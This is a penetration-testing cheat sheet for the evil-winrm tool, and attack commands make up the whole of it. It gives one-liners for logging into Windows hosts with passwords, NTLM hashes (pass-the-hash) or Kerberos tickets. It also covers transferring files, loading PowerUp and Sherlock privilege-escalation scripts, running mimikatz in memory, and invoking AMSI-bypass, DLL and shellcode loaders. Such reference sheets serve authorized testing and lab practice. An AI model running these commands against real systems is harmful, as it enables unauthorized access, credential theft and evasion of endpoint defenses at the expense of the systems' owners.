Connect
evil-winrm -i TARGET -u user -p 'password'
evil-winrm -i TARGET -u 'DOMAIN\user' -p 'password'
evil-winrm -i TARGET -u user -H NTLM_HASH
With SSL (Port 5986)
evil-winrm -i TARGET -u user -p 'password' -S
File Transfer
*Evil-WinRM* PS> upload /local/path/file.exe C:\Windows\Temp\file.exe
*Evil-WinRM* PS> download C:\Users\admin\Desktop\flag.txt /tmp/flag.txt
Load PowerShell Scripts
evil-winrm -i TARGET -u user -p 'password' -s /opt/scripts/
*Evil-WinRM* PS> PowerUp.ps1
*Evil-WinRM* PS> Invoke-AllChecks
*Evil-WinRM* PS> Sherlock.ps1
*Evil-WinRM* PS> Find-AllVulns
Load Binaries
evil-winrm -i TARGET -u user -p 'password' -e /opt/binaries/
*Evil-WinRM* PS> Invoke-Binary /opt/binaries/mimikatz.exe
*Evil-WinRM* PS> menu
*Evil-WinRM* PS> Bypass-4MSI # AMSI bypass
*Evil-WinRM* PS> Dll-Loader # Load DLL
*Evil-WinRM* PS> Donut-Loader # Shellcode loader
With Kerberos Ticket
export KRB5CCNAME=ticket.ccache
evil-winrm -i TARGET -r DOMAIN
Quick Reference
| Task | Command |
|---|---|
| Login | evil-winrm -i TARGET -u user -p pass |
| PtH | evil-winrm -i TARGET -u user -H HASH |
| Upload | upload /local/file C:\remote\path |
| Scripts | -s /path/ then Script.ps1 in shell |
| AMSI bypass | Bypass-4MSI |